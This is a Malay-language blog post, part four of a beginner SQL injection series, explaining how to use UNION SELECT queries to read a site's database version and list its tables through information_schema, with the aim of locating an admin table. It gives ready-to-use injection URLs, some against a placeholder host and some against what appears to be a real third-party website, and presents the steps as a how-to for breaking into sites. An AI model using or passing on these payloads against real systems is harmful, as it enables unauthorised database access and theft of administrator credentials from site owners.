Asas SQLi - Tutorial S4



Janjang tak mau cite panjang, jom kita tengok langkah seterusnya selepas kita dah dapat nombor2 ajaib tu..

Kumpul Maklumat


- Setelah kita mendapat no ajaib iaitu 8, 3, 4 dan 5 , disini kita akan cuba dapatkan pula maklumat versi / database yang digunakan laman ini.

- Jadi , anda hanya perlu tambah arahan version() atau "@@version" pada no ajaib , maka akan keluar versi / database yang digunakan. Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,version(),3-- 
atau
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,@@version,3-- 

- Maka versi database akan muncul seperti 4.X.X atau 5.X.X , jika database laman tersebut menggunakan versi 5 , maka anda boleh guna default database name nya iaitu information_schema .

- Jadi , database name kita dah dapat , seterusnya kita dapatkan table name pula melalui arahan TABLE_NAME. Arahan ini diletakkan di no ajaib tadi

- Contohnya :
http://www.contoh.my/index.php?id=1+UNION+SELECT+1,TABLE_NAME,3-- 
- Dan tambahkan database name kat belakang menjadi :
 http://www.contoh.my/index.php?id=1+UNION+SELECT+1,TABLE_NAME,3+from+information_schema.tables--

- Maka anda akan dapat lihat table yang ada dalam database laman tersebut.

Mendapatkan versi pangkalan data

Kita sudah jumpa column 8 , 3 , 4 and 5 adalah column ‘vulnerable’ jadi kita akan gunakannya untuk mendapatkan versi database yang digunakan.


Eh, kenapa pula kita nak kena tau versi database pulak ni?
sebabnya, kalau database dibawah versi 5, kita perlu meneka nama table yang ada. Sebaliknya jika database dalam versi 5 dan keatas, kita hanya perlukan ‘default name’ iaitu information_schema.


kita perlu tukar salah 1 column yang ‘vulnerable’ kepada “@@version” atau “version()".

Untuk contoh, kita ambil column 8.

Link kita sepatutnya kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

The page should look like that :

Dalam contoh tutorial ini kita dapat  versi 5.0.77 yang mana ia diatas versi 5, jadi kita teruskan langkah seterusnya.


sekarang kita perlukan nama table yang kita nak akses :
untuk itu, kita perlu tukarkan “@@version dengan “table_name" dan menambah selepas nombor column terakhir  dengan “from information_schema.tables" dan kemudian diikuti dengan "--" dihujung.



link kita akan kelihatan seperti ini:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

dan laman akan kelihatan begini:

Sekarang kita akan cari table mana yang kita mahu akses dan dapatkan maklumat.
Kita perlukan maklumat berkenaan dengan admin, dan dalam kes kita kita dapati tbladmin adalah yang kita perlukan. (skrol kebawah dan perhatikan semua table betul-betul untuk mencari table yang tepat)

Sekarang kita dah dapat table yang diperlukan. Lepas ni, apa kita kena buat? Tunggu siri seterusnya. insyaAllah siri yang terakhir dalam tutorial ringkas asas suntikan SQL ini.

Setakat ini macam mane? Harap2 korang semua dapat paham. Ikuti siri seterusnya yang kelima dan terakhir insyaAllah dalam masa terdekat. kalau ade soalan, boleh tanya diruang komen, Janjang akan cuba dapatkan jawapan.
Powered by Blogger.